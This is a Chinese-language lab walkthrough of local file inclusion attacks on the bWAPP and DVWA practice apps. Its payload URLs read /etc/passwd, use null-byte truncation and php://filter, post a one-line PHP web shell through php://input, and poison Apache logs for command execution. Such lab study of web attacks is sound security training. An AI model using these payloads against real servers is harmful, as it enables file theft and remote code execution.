准备环境
本次使用bWAPP和DVWA作为测试系统,填写 bee/bug 登录系统
选择"本地文件包含" and then hack it
0x1基本的文件包含
http://192.168.66.133/bWAPP/rlfi.php?language=lang_en.php&action=go
http://192.168.66.133/bWAPP/rlfi.php?language=/etc/passwd&action=go
0x2空字节截断
提升系统安全等级,再进行测试,上述方法就会失效
采用%00进行截断包含
http://192.168.66.133/bWAPP/rlfi.php?language=/etc/passwd%00&action=go
0x3Base64编码
利用php://filter和base64对获取的内容进行编码显示
http://192.168.66.133/bWAPP/rlfi.php?language=**php://filter/read=convert.base64-encode/resource=**/etc/passwd%00
对获取到的数据再进行base64解码即可
0x4PHP输入流
利用php://input读取没有处理过的POST数据,POST内容为一句话木马
http://192.168.66.133/bWAPP/rlfi.php?language=**php://input&cmd=id**
POST:<?php system($_GET['cmd']); ?>
0x5日志包含
apache会通过日志文件记录用户的连接信息,这些信息包括ip地址、访问时间、请求类型、状态码等信息。这样我们通过访问指定的url将一句话写入到日志文件中,然后通过文件包含漏洞包含Apache日志文件。注意:要使用burp提交数据,绕过前端浏览器url编码
http://192.168.66.133/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id